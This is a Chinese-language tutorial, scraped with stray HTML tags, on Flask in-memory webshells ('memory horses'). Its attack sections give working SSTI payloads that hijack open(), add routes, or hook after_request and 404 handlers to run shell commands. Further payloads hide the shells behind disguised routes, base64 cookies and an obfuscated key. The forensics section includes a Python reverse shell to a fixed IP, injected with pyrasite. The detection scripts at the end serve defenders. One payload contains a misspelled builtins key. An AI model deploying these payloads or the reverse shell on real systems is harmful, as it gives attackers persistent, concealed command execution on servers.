Flask内存马攻防技术详解<\/h1>

一、Flask内存马攻击技术<\/h2>

1. 函数劫持式内存马<\/h3>
通过劫持Python内置函数实现持久化后门，适用于各种Python后端框架：<\/p>
{{lipsum.<\/span>__globals__['__builtins__'<\/span>]['exec'<\/span>]("global original_open<\/span>
<\/span><\/span>original_open=<\/span>globals()['__builtins__'<\/span>]['open'<\/span>]
<\/span><\/span>def<\/span> custom_open<\/span>(*<\/span>args,**<\/span>kwargs):
<\/span><\/span>        from<\/span> flask import<\/span> request
<\/span><\/span>        if<\/span> request.<\/span>query_params.<\/span>get("cmd"<\/span>):return<\/span> __import__('io'<\/span>).<\/span>StringIO(__import__('os'<\/span>).<\/span>popen(request.<\/span>query_params.<\/span>get("cmd"<\/span>)).<\/span>read())
<\/span><\/span>        else<\/span>:return<\/span> original_open(*<\/span>args,**<\/span>kwargs)
<\/span><\/span>
<\/span><\/span>globals()['__builtins__'<\/span>]['open'<\/span>]=<\/span>custom_open")}}<\/span>
<\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p>

劫持open()<\/code>函数实现命令执行<\/li>
不影响正常文件操作<\/li>
可通过cmd<\/code>参数传递命令<\/li>
<\/ul>
2. 添加路由式内存马(Flask高版本)<\/h3>
# 第一步：添加URL规则<\/span>
<\/span><\/span>url_for.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>](
<\/span><\/span>    "app.url_map.add(<\/span>
<\/span><\/span>        app.<\/span>url_rule_class('\/shell'<\/span>, methods=<\/span>['GET'<\/span>], endpoint=<\/span>'shell'<\/span>)
<\/span><\/span>    )",<\/span>
<\/span><\/span>    {
<\/span><\/span>        'app'<\/span>:url_for.<\/span>__globals__['current_app'<\/span>]
<\/span><\/span>    }
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span># 第二步：添加视图函数<\/span>
<\/span><\/span>url_for.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>](
<\/span><\/span>    "app.view_functions.update(<\/span>
<\/span><\/span>        {
<\/span><\/span>            'shell'<\/span>: lambda<\/span>:__import__('os'<\/span>).<\/span>popen(
<\/span><\/span>                app.<\/span>request_context.<\/span>__globals__['request_ctx'<\/span>].<\/span>request.<\/span>args.<\/span>get('cmd'<\/span>, 'whoami'<\/span>)
<\/span><\/span>            ).<\/span>read()
<\/span><\/span>        }
<\/span><\/span>    )",<\/span>
<\/span><\/span>    {
<\/span><\/span>        'app'<\/span>:url_for.<\/span>__globals__['current_app'<\/span>]
<\/span><\/span>    }
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>3. after_request式内存马<\/h3>
{{url_for.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(<\/span>\"<\/span>global CmdResp;CmdResp=__import__(<\/span>\'<\/span>flask<\/span>\'<\/span>).make_response(__import__(<\/span>\'<\/span>os<\/span>\'<\/span>).popen(request.args.get(<\/span>\'<\/span>cmd<\/span>\'<\/span>)).read())<\/span>\"<\/span>)==None else resp)"<\/span>,{'request'<\/span>:url_for.<\/span>__globals__['request'<\/span>],'app'<\/span>:get_flashed_messages.<\/span>__globals__['current_app'<\/span>]})}}
<\/span><\/span><\/code><\/pre>4. 错误触发式内存马<\/h3>
{{url_for.<\/span>__globals__['__builtals__'<\/span>]['exec'<\/span>]("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error:__import__('os').popen(request.args.get('qwq')).read()"<\/span>, {'request'<\/span>:url_for.<\/span>__globals__['request'<\/span>],'app'<\/span>:get_flashed_messages.<\/span>__globals__['current_app'<\/span>]})}}
<\/span><\/span><\/code><\/pre>二、内存马隐匿技术<\/h2>
1. 伪装常见路由<\/h3>
url_for.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>](
<\/span><\/span>    "app.view_functions.update(<\/span>
<\/span><\/span>        {
<\/span><\/span>            'api\/user\/log'<\/span>: lambda<\/span>:__import__('os'<\/span>).<\/span>popen(
<\/span><\/span>                app.<\/span>request_context.<\/span>__globals__['request_ctx'<\/span>].<\/span>request.<\/span>args.<\/span>get('cmd'<\/span>, 'whoami'<\/span>)
<\/span><\/span>            ).<\/span>read()
<\/span><\/span>        }
<\/span><\/span>    )",<\/span>
<\/span><\/span>    {
<\/span><\/span>        'app'<\/span>:url_for.<\/span>__globals__['current_app'<\/span>]
<\/span><\/span>    }
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>2. 加密参数传递<\/h3>
{{url_for.<\/span>__globals__['__builtins__'<\/span>]['exec'<\/span>]("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error: __import__('os').popen(__import__('base64').b64decode(request.cookies.get('userinfo')).decode('utf-8')).read()"<\/span>, {'request'<\/span>:url_for.<\/span>__globals__['request'<\/span>],'app'<\/span>:get_flashed_messages.<\/span>__globals__['current_app'<\/span>]})}}
<\/span><\/span><\/code><\/pre>3. 高级加密方案<\/h3>
global<\/span> exc_class
<\/span><\/span>global<\/span> code
<\/span><\/span>from<\/span> itsdangerous import<\/span> URLSafeSerializer
<\/span><\/span>from<\/span> flask import<\/span> request
<\/span><\/span>import<\/span> json
<\/span><\/span>exc_class, code =<\/span> app.<\/span>_get_exc_class_and_code(404<\/span>)
<\/span><\/span>secret_key=<\/span>''<\/span>.<\/span>join(chr(ord(a) ^<\/span> ord(b)) for<\/span> a, b in<\/span> zip('M8):M2uY[2%<^4+'<\/span>,',M[U?SX4>_VT;XG'<\/span>))
<\/span><\/span>def<\/span> execute_command<\/span>(cmd,secret_key):
<\/span><\/span>    serializer =<\/span> URLSafeSerializer(secret_key)
<\/span><\/span>    encrypted_userinfo=<\/span>cmd
<\/span><\/span>    if<\/span> not<\/span> encrypted_userinfo:
<\/span><\/span>        return<\/span>
<\/span><\/span>    try<\/span>:
<\/span><\/span>        command =<\/span> serializer.<\/span>loads(encrypted_userinfo)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        data =<\/span> {
<\/span><\/span>            'status'<\/span>: 'error'<\/span>,
<\/span><\/span>            'message'<\/span>: 'Decryption failed'<\/span>,
<\/span><\/span>            'result'<\/span>: ''<\/span>
<\/span><\/span>        }
<\/span><\/span>    try<\/span>:
<\/span><\/span>        result=<\/span>None<\/span>
<\/span><\/span>        eval(command)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        data =<\/span> {
<\/span><\/span>            'status'<\/span>: 'error'<\/span>,
<\/span><\/span>            'message'<\/span>: str(e),
<\/span><\/span>            'result'<\/span>: ''<\/span>
<\/span><\/span>        }
<\/span><\/span>    data =<\/span> {
<\/span><\/span>        'status'<\/span>: 'ok'<\/span>,
<\/span><\/span>        'result'<\/span>: serializer.<\/span>dumps(result)
<\/span><\/span>    }
<\/span><\/span>    return<\/span> json.<\/span>dumps(data)
<\/span><\/span>app.<\/span>error_handler_spec[None<\/span>][code][exc_class] =<\/span> lambda<\/span> error: execute_command(request.<\/span>cookies.<\/span>get('userinfo'<\/span>), secret_key)
<\/span><\/span><\/code><\/pre>三、防御与检测技术<\/h2>
1. 内存取证技术<\/h3>
使用pyrasite<\/code>库注入Python反向shell：<\/p>
#!\/usr\/bin\/env python3<\/span>
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> code
<\/span><\/span>
<\/span><\/span>def<\/span> reverse_python_shell<\/span>(target_ip, target_port):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        sock =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>        sock.<\/span>connect((target_ip, target_port))
<\/span><\/span>        sock_file =<\/span> sock.<\/span>makefile("rw"<\/span>)
<\/span><\/span>        sys.<\/span>stdin =<\/span> sock_file
<\/span><\/span>        sys.<\/span>stdout =<\/span> sock_file
<\/span><\/span>        sys.<\/span>stderr =<\/span> sock_file
<\/span><\/span>        shell =<\/span> code.<\/span>InteractiveConsole(globals())
<\/span><\/span>        shell.<\/span>interact()
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        try<\/span>:
<\/span><\/span>            sock.<\/span>sendall(f<\/span>"Error: <\/span>{<\/span>str(e)}<\/span>\n<\/span>"<\/span>.<\/span>encode())
<\/span><\/span>        finally<\/span>:
<\/span><\/span>            sock.<\/span>close()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    target_ip =<\/span> "192.168.239.199"<\/span>
<\/span><\/span>    target_port =<\/span> 4444<\/span>
<\/span><\/span>    reverse_python_shell(target_ip, target_port)
<\/span><\/span><\/code><\/pre>注入命令：<\/p>
pyrasite (<\/span>pgrep -f "python3"<\/span>)<\/span> shell-rev-py.py --verbose
<\/span><\/span><\/code><\/pre>2. 内存马检测技术<\/h3>
检测errorhandler内存马<\/h4>
global<\/span> exc_class;global<\/span> code;exc_class,code=<\/span>app.<\/span>_get_exc_class_and_code(404<\/span>);
<\/span><\/span>memshell=<\/span>app.<\/span>error_handler_spec[None<\/span>][code][exc_class]
<\/span><\/span>import<\/span> dis
<\/span><\/span>dis.<\/span>dis(memshell)
<\/span><\/span><\/code><\/pre>检测before\/after_request内存马<\/h4>
app.<\/span>after_request_funcs
<\/span><\/span>app.<\/span>before_request_funcs
<\/span><\/span><\/code><\/pre>检测路由内存马<\/h4>
for<\/span> rule in<\/span> app.<\/span>url_map.<\/span>iter_rules():
<\/span><\/span>    print(f<\/span>"Endpoint: <\/span>{<\/span>rule.<\/span>endpoint}<\/span>, Methods: <\/span>{<\/span>rule.<\/span>methods}<\/span>, Rule: <\/span>{<\/span>rule.<\/span>rule}<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>使用inspect模块检测<\/h4>
import<\/span> inspect
<\/span><\/span>suspicious_function =<\/span> app.<\/span>view_functions["test"<\/span>]
<\/span><\/span>print("Function name:"<\/span>, suspicious_function.<\/span>__name__)
<\/span><\/span>print("Source file:"<\/span>, inspect.<\/span>getfile(suspicious_function))
<\/span><\/span>print("Source code:"<\/span>, inspect.<\/span>getsource(suspicious_function))
<\/span><\/span><\/code><\/pre>3. 综合检测脚本<\/h3>
#!\/usr\/bin\/env python3<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> dis
<\/span><\/span>import<\/span> inspect
<\/span><\/span>from<\/span> collections import<\/span> defaultdict
<\/span><\/span>
<\/span><\/span>OUTPUT_FILE =<\/span> "\/tmp\/flask_memshell_analysis.txt"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> save_to_file<\/span>(data):
<\/span><\/span>    with<\/span> open(OUTPUT_FILE, "a"<\/span>) as<\/span> f:
<\/span><\/span>        f.<\/span>write(data +<\/span> "<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> analyze_function<\/span>(func, description):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        bytecode =<\/span> func.<\/span>__code__.<\/span>co_code
<\/span><\/span>        bytecode_b64 =<\/span> base64.<\/span>b64encode(bytecode).<\/span>decode()
<\/span><\/span>        disassembled =<\/span> dis.<\/span>Bytecode(func)
<\/span><\/span>        disassembled_str =<\/span> "<\/span>\n<\/span>"<\/span>.<\/span>join([f<\/span>"<\/span>{<\/span>instr.<\/span>opname}<\/span> <\/span>{<\/span>instr.<\/span>argrepr}<\/span>"<\/span> for<\/span> instr in<\/span> disassembled])
<\/span><\/span>        
<\/span><\/span>        save_to_file(f<\/span>"=== <\/span>{<\/span>description}<\/span> ==="<\/span>)
<\/span><\/span>        save_to_file(f<\/span>"Function: <\/span>{<\/span>func.<\/span>__name__}<\/span>"<\/span>)
<\/span><\/span>        save_to_file(f<\/span>"File: <\/span>{<\/span>inspect.<\/span>getfile(func)}<\/span>"<\/span>)
<\/span><\/span>        save_to_file(f<\/span>"Base64 Bytecode: <\/span>{<\/span>bytecode_b64}<\/span>"<\/span>)
<\/span><\/span>        save_to_file(f<\/span>"Disassembled Bytecode:<\/span>\n<\/span>{<\/span>disassembled_str}<\/span>\n<\/span>"<\/span>)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        save_to_file(f<\/span>"Error analyzing function <\/span>{<\/span>func}<\/span>: <\/span>{<\/span>str(e)}<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> check_dynamic_routes<\/span>(app):
<\/span><\/span>    save_to_file("=== Dynamic Routes ==="<\/span>)
<\/span><\/span>    try<\/span>:
<\/span><\/span>        for<\/span> rule in<\/span> app.<\/span>url_map.<\/span>iter_rules():
<\/span><\/span>            func =<\/span> app.<\/span>view_functions[rule.<\/span>endpoint]
<\/span><\/span>            save_to_file(f<\/span>"Endpoint: <\/span>{<\/span>rule.<\/span>endpoint}<\/span>, Methods: <\/span>{<\/span>rule.<\/span>methods}<\/span>, Rule: <\/span>{<\/span>rule.<\/span>rule}<\/span>"<\/span>)
<\/span><\/span>            analyze_function(func, f<\/span>"Route Function (<\/span>{<\/span>rule.<\/span>endpoint}<\/span>)"<\/span>)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        save_to_file(f<\/span>"Error checking routes: <\/span>{<\/span>str(e)}<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> check_before_request<\/span>(app):
<\/span><\/span>    save_to_file("=== Before Request ==="<\/span>)
<\/span><\/span>    try<\/span>:
<\/span><\/span>        for<\/span> func in<\/span> app.<\/span>before_request_funcs.<\/span>get(None<\/span>, []):
<\/span><\/span>            analyze_function(func, "Before Request Function"<\/span>)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        save_to_file(f<\/span>"Error checking before_request: <\/span>{<\/span>str(e)}<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> check_after_request<\/span>(app):
<\/span><\/span>    save_to_file("=== After Request ==="<\/span>)
<\/span><\/span>    try<\/span>:
<\/span><\/span>        for<\/span> func in<\/span> app.<\/span>after_request_funcs.<\/span>get(None<\/span>, []):
<\/span><\/span>            analyze_function(func, "After Request Function"<\/span>)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        save_to_file(f<\/span>"Error checking after_request: <\/span>{<\/span>str(e)}<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> check_error_handlers<\/span>(app):
<\/span><\/span>    save_to_file("=== Error Handlers ==="<\/span>)
<\/span><\/span>    try<\/span>:
<\/span><\/span>        for<\/span> code, handler_map in<\/span> app.<\/span>error_handler_spec[None<\/span>].<\/span>items():
<\/span><\/span>            for<\/span> exc_class, func in<\/span> handler_map.<\/span>items():
<\/span><\/span>                analyze_function(func, f<\/span>"Error Handler (<\/span>{<\/span>exc_class}<\/span>, <\/span>{<\/span>code}<\/span>)"<\/span>)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        save_to_file(f<\/span>"Error checking error handlers: <\/span>{<\/span>str(e)}<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    save_to_file("=== Flask Memory Shell Analysis ==="<\/span>)
<\/span><\/span>    save_to_file(f<\/span>"Injected into process PID: <\/span>{<\/span>os.<\/span>getpid()}<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>    if<\/span> 'app'<\/span> not<\/span> in<\/span> globals():
<\/span><\/span>        save_to_file("Error: No 'app' variable found in globals.<\/span>\n<\/span>"<\/span>)
<\/span><\/span>        return<\/span>
<\/span><\/span>
<\/span><\/span>    app =<\/span> globals()['app'<\/span>]
<\/span><\/span>    save_to_file(f<\/span>"Flask app detected: <\/span>{<\/span>repr(app)}<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>    check_dynamic_routes(app)
<\/span><\/span>    check_before_request(app)
<\/span><\/span>    check_after_request(app)
<\/span><\/span>    check_error_handlers(app)
<\/span><\/span>    save_to_file("=== Analysis Complete ===<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>4. FastAPI内存马检测<\/h3>
import<\/span> sys
<\/span><\/span>import<\/span> inspect
<\/span><\/span>from<\/span> fastapi.routing import<\/span> APIRoute
<\/span><\/span>from<\/span> starlette.middleware.base import<\/span> BaseHTTPMiddleware
<\/span><\/span>
<\/span><\/span>def<\/span> detect_middleware_injection<\/span>(app):
<\/span><\/span>    print("=== Checking Middlewares ==="<\/span>)
<\/span><\/span>    for<\/span> index, middleware in<\/span> enumerate(app.<\/span>user_middleware):
<\/span><\/span>        try<\/span>:
<\/span><\/span>            dispatch_func =<\/span> middleware.<\/span>options.<\/span>get("dispatch"<\/span>, None<\/span>)
<\/span><\/span>            if<\/span> dispatch_func:
<\/span><\/span>                print(f<\/span>"Middleware <\/span>{<\/span>index}<\/span>: <\/span>{<\/span>middleware.<\/span>cls.<\/span>__name__}<\/span>"<\/span>)
<\/span><\/span>                print(f<\/span>"Dispatch function: <\/span>{<\/span>dispatch_func}<\/span>"<\/span>)
<\/span><\/span>                if<\/span> inspect.<\/span>isfunction(dispatch_func):
<\/span><\/span>                    source_file =<\/span> inspect.<\/span>getfile(dispatch_func)
<\/span><\/span>                    if<\/span> source_file ==<\/span> "<string>"<\/span>:
<\/span><\/span>                        print(f<\/span>"  [ALERT] Middleware <\/span>{<\/span>index}<\/span> has dynamically defined dispatch function!"<\/span>)
<\/span><\/span>                        print(f<\/span>"  Function source: <\/span>{<\/span>inspect.<\/span>getsource(dispatch_func)}<\/span>"<\/span>)
<\/span><\/span>                    else<\/span>:
<\/span><\/span>                        print(f<\/span>"  Source file: <\/span>{<\/span>source_file}<\/span>"<\/span>)
<\/span><\/span>        except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>            print(f<\/span>"Error analyzing middleware <\/span>{<\/span>index}<\/span>: <\/span>{<\/span>e}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> detect_route_injection<\/span>(app):
<\/span><\/span>    print("=== Checking Routes ==="<\/span>)
<\/span><\/span>    for<\/span> route in<\/span> app.<\/span>routes:
<\/span><\/span>        if<\/span> isinstance(route, APIRoute):
<\/span><\/span>            endpoint =<\/span> route.<\/span>endpoint
<\/span><\/span>            try<\/span>:
<\/span><\/span>                source_file =<\/span> inspect.<\/span>getfile(endpoint)
<\/span><\/span>                if<\/span> source_file ==<\/span> "<string>"<\/span>:
<\/span><\/span>                    print(f<\/span>"  [ALERT] Route <\/span>{<\/span>route.<\/span>path}<\/span> has dynamically defined endpoint!"<\/span>)
<\/span><\/span>                    print(f<\/span>"  Endpoint source: <\/span>{<\/span>inspect.<\/span>getsource(endpoint)}<\/span>"<\/span>)
<\/span><\/span>                else<\/span>:
<\/span><\/span>                    print(f<\/span>"  Route <\/span>{<\/span>route.<\/span>path}<\/span> -> Endpoint: <\/span>{<\/span>endpoint.<\/span>__name__}<\/span>"<\/span>)
<\/span><\/span>                    print(f<\/span>"  Source file: <\/span>{<\/span>source_file}<\/span>"<\/span>)
<\/span><\/span>            except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>                print(f<\/span>"Error analyzing route <\/span>{<\/span>route.<\/span>path}<\/span>: <\/span>{<\/span>e}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    if<\/span> "app"<\/span> not<\/span> in<\/span> sys.<\/span>modules["__main__"<\/span>].<\/span>__dict__:
<\/span><\/span>        print("Error: No FastAPI app instance found in the main module."<\/span>)
<\/span><\/span>        return<\/span>
<\/span><\/span>
<\/span><\/span>    app =<\/span> sys.<\/span>modules["__main__"<\/span>].<\/span>__dict__["app"<\/span>]
<\/span><\/span>    print(f<\/span>"Detected FastAPI app: <\/span>{<\/span>app}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>    detect_middleware_injection(app)
<\/span><\/span>    detect_route_injection(app)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>